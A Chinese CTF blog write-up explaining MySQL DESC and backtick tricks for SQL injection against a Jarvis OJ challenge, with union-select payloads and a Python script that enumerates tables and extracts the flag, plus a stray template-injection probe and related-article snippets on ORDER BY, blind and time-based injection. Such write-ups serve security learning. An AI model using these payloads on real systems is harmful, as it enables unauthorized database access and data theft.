desc相关注入

最新推荐文章于 2024-05-15 02:28:19 发布
最新推荐文章于 2024-05-15 02:28:19 发布
阅读量795 收藏
点赞数
分类专栏: CTF Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43415644/article/details/113447386
版权

{DESCRIBE | DESC}  table_name [col_name|wlid]

DESCRIBE 提供有关一个表的列信息 col_name 可以是一个 列名或是一个包含 SQL 通配符字符 “%” 和 “_” 的字符 串。

desc 表名之后跟列名

desc 表名 之后 跟一个不存在的列名:

例题:

题目地址:http://web.jarvisoj.com:32794/

通过目录扫描发现了该站点的一个源文件index.php~

因为index.php~ 没有被nginx解析 所以可以看到源代码:

mysql中反引号的作用:

比如你想要创建一个数据库,但是这个数据库名中含有mysql的保留字,就必须用``将这个保留字给引起来

题目关键点在于:payload成功穿过第一条desc 语句,让desc语句不报错的情况下,攻击到第二条select语句

?table = test` `union select database() limit 1 offset 1

desc `secret_test` `union select database() limit 1 offset 1`

select `flag{xxx}` from secret_test` `union select database() limit 1 offset 1

上句话中 ` `起到了空格的作用,相互闭合了。

payload:

import requests
import base64


baseurl = """http://web.jarvisoj.com:32794"""
def str2Hex(stri):
    return '0x'+base64.b16encode(stri.encode("utf-8")).decode("utf-8")
def showGet(url):
    resp = requests.get(url)
    print(resp.text)
def Db():
    url = baseurl+"""?table=test` `union select database() limit 1 offset 1 """
    showGet(url)
def Tables():
    url = baseurl+"""?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1 offset 1"""
    showGet(url)
def Columns(table):
    table = str2Hex(table)
    url = baseurl+"""?table=test` `union select group_concat(column_name) from information_schema.columns where table_name=%s limit 1 offset 1"""%(table)
    # print(url)
    showGet(url)
def Data():
    url = baseurl+"""?table=test` `union select group_concat(flagUwillNeverKnow) from secret_flag limit 1 offset 1"""
    showGet(url)

if __name__ == "__main__":
    # Db() #61d300
    Tables() #secret_flag,secret_test
    Columns("secret_flag") #flagUwillNeverKnow
    Data() #flag{luckyGame~}

 

 

'"<>{{7*7}}
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
desc巧用及反引号 ` SQL注入——【61dctf】 inject writeup
Ve99tr’s Blog
09-02 1844
题目链接 :http://web.jarvisoj.com:32794/ 描述 进入页面,发现只有 flag{xxx} 题目hint:先找到源码~ 源码泄露 使用后台目录扫描工具御剑进行后台扫描 源码泄露: http://web.jarvisoj.com:32794/index.php~ F12查看器得到泄露的源码 <?php require("config.php"); $ta...
CTF从入门到提升(八)desc注入相关例题分享
anquanniu的博客
09-03 1042
desc注入相关例题分享 desc是函数describe的简写,一般用来提供和表相关的列信息来查看表的结构。 很多CTF赛题考点都是运用它的一些我们不太熟悉的特性或者说使用方法。常规来讲desc后面跟的是表名,但事实远不止于此,除了表名还可以有第二个参数。 而且在第二个参数中,它除了列名之外,还可以是包含sql通配符的字符串。 演示一下: 它会出一个表的一个结构。 下一个参数去跟一个列名: ...
【ctf】sql注入——desc注入
wlllllianqing的博客
10-04 552
desc注入 desc函数是用来提供一个表的列信息 desc 表名 列名 describe 表名 列名 这里提到一个点,当我们在mysql中想要使用已经被定义的字段作为数据库或表名时该怎么办? 直接使用会报错,这里就要用到一个符号 反引号:`` 当我们将表名和列名使用引号时,发现会报错,这里只能使用反引号; 而且我们发现,如果我们查询一个不存在的列名时,该语句仍然会执行,只是会返回empty,那么这也是一个绕过或者注入的思路; ...
CTF从入门到提升(八)desc注入相关例题分享_desc排序注入(1)
最新发布
m0_60707579的博客
05-15 495
desc是函数describe的简写,一般用来提供和表相关的列信息来查看表的结构。16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?11、什么叫网站灰度发布?
小结--order by 注入
weixin_30586085的博客
05-23 204
之前已经学过的东西,准备把他们依次总结下,包括之前看的一些文章,一些小的tricks之类的,就先从注入开始吧 0x01 盲注 1. 判断1和0 a. if select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2)); +-------+----------...
MySQL desc作用
weixin_30580341的博客
05-30 138
MySQL中默认排序是acs(可省略):从小到大 desc :从大到小,也叫倒序排列。 转载于:https://www.cnblogs.com/yangykaifa/p/6919689.html
DB2数据库SQL注入语句
02-17
例如,`and 0<(SELECT LENGTH(PASSWD) FROM TABLE ORDER BY ID DESC FETCH FIRST 1 ROWS ONLY)`可以获取ID降序排列的表格中第一个'PASSWD'字段的长度,而`ASCII(SUBSTR(PASSWD,1,1))`可以获取该密码的第一个字符的...
ibatis动态注入
11-12
本文将深入探讨iBATIS动态注入相关知识点。 iBATIS动态SQL主要通过XML映射文件中的特定标签实现,允许我们根据业务需求动态地构建SQL语句。这些动态元素使得SQL语句可以根据传入的参数值动态地调整,避免了大量IF...
mssql2005注入方法小结
09-14
SQL注入是一种常见的安全漏洞,它发生在应用程序不恰当地将用户输入的数据与SQL命令结合时。在本文中,我们将深入探讨针对Microsoft SQL Server 2005(简称mssql2005)的SQL注入方法,以及如何利用这些方法进行...
PHPSHE 1.6 userbank sql注入1
08-04
$sqlwhere .= " order by `userbank_id` desc"; $info_list = $db->pe_selectall('userbank', $sqlwhere, '*', array(50, $_g_page)); $tongji['user'] = $db->pe_num('user'); $tongji['useraddr'] = $db->pe_num('...
mysql order by注入技巧
一个码农的笔记
11-05 4978
select user from user order by user,If((1=1),1,(select user from mysql.user)) desc; http://www.2cto.com/Article/201305/209335.html 记一下,免得忘了
MySQL注入秘籍【上篇】
大河之犬的博客
03-21 939
通常使用联合查询注入法,其作用就是,在原来查询条件的基础上,通过关键字union、union all拼接恶意SQL语句,union后面的select得到的结果将拼接到前个select的结果的后面。既然已经知道了查询列数了,那我们就需要判断哪些列的内容是可以显示到前端的,因为能显示到前端的字段,我们在利用时也能直接显示我们想要的数据。报错原理:e的x次方到x每增加1,其结果都将跨度极大,而mysql能记录的double数值范围有限,一旦结果超过范围,则该函数报错。直接查询数据库,不需要判断字段数、显位等;
limit 后注入_CTF从入门到提升(八)desc注入相关例题分享
weixin_39619481的博客
12-03 122
desc注入相关例题分享desc是函数describe的简写,一般用来提供和表相关的列信息来查看表的结构。很多CTF赛题考点都是运用它的一些我们不太熟悉的特性或者说使用方法。常规来讲desc后面跟的是表名,但事实远不止于此,除了表名还可以有第二个参数。 而且在第二个参数中,它除了列名之外,还可以是包含sql通配符的字符串。演示一下:它会出一个表的一个结构。下一个参数去跟一个列名:例题分享第一步先...
sqlilabs靶场记录排序注入(九)
wanan的博客
10-09 679
sqlilabs靶场记录排序注入(九)
mysql:desc、去除换行
洪君的博客
03-12 1831
提升某条数据的排名 SELECT * FROM sys_province ORDER BY `day` DESC day:为date 也可以是数字,day为某数字,其余为空,然后desc,那么day有值的那一条永远排列第一 其实,条件允许的话,下面这种更加nice。 ...
sql注入总结--详细
weixin_44576725的博客
11-19 5823
文章目录SQL注入总结1、原理2、数据库基础系统函数字符串连接函数mysql注释符union 操作符的介绍order by介绍字符串编码数据库结构导入导出相关操作增删改函数3、判断是否存在SQL注入4、回显注入(联合注入)查询字段数目查询库名查询表名查询字段名查询字段值获取WebShell5、盲注sql注入截取字符串常用函数REGEXP正则表达式LIKE 匹配布尔盲注布尔盲注的流程脚本时间盲注DNSLog盲注6、堆叠注入7、报错注入数据溢出xpath语法错误主键重复一些特性8、二次注入9、ORDER BY
关于MySQL注入点的问题
春日野穹
01-24 322
order by后注入 注入点在 order by后面,order by 后面不能带union select,此处可以利用报错信息进行注入 order by后不能参数化,不只order by,凡是字符串但又不能加引号的位置都不能参数化;包括sql关键字、库名表名字段名函数名等等,否则就会产生了语法错误 order by后不能参数化,可关注orderby、sort参数 desc或者asc(升序or降序排列)显示结果不同,则表明可以注入 mysql> select * from users order b
初识排序注入
白帽子凯哥聊黑客
05-12 510
但是采用预编译执行SQL语句传入的参数不能作为SQL语句的一部分,那么Order By后的字段名、或者是desc\asc也不能预编译处理,那么也就是说Order By场景的排序规则还是只能使用拼接,这时候如果在开发阶段没有处理好,那么就很可能导致SQL注入问题了。拿着这个poc去尝试这些天碰到的排序注入,发现都可以嗷,对比盲注来说,漏洞证明的过程还是会节省一些时间。总之都是利用盲注的方式来获取数据,从基础的poc fuzz到poc2、poc3甚至poc4,取决于waf的强弱、个人习惯。
sql注入中order by
04-30
在SQL注入中,"ORDER BY"是一种常用的攻击手法之一。它通常用于利用应用程序对SQL查询结果的排序方式进行操作,从而获取额外的信息或者绕过安全措施。 "ORDER BY"子句用于对查询结果进行排序。它可以按照一个或多个列进行排序,并指定升序(ASC)或降序(DESC)。在正常情况下,应用程序会根据用户的选择或者默认设置来构建"ORDER BY"子句。 然而,在SQL注入攻击中,攻击者可以通过构造恶意输入来修改"ORDER BY"子句,以达到他们的目的。以下是一些常见的SQL注入中的"ORDER BY"攻击技巧: 1. 利用错误消息:攻击者可以通过在"ORDER BY"子句中使用不存在的列名或者无效的排序方式来触发错误消息。这些错误消息可能会泄露数据库的结构信息,如表名、列名等。 2. 盲注攻击:攻击者可以通过使用布尔逻辑来判断某个条件是否成立,从而逐位地猜测查询结果。例如,通过使用"ORDER BY"子句来判断某个列的值是否大于或小于某个特定值。 3. 时间延迟攻击:攻击者可以通过在"ORDER BY"子句中使用时间延迟函数,如SLEEP()或BENCHMARK(),来延长查询的执行时间。这可以用于判断某个条件是否成立,或者用于拖慢应用程序的响应时间。 为了防止SQL注入攻击中的"ORDER BY"攻击,开发人员应该采取以下措施: 1. 使用参数化查询或预编译语句:这可以防止攻击者通过注入恶意代码来修改"ORDER BY"子句。 2. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只允许合法的输入。 3. 最小权限原则:将数据库用户的权限限制在最小必需的范围内,以减少攻击者可以利用的漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值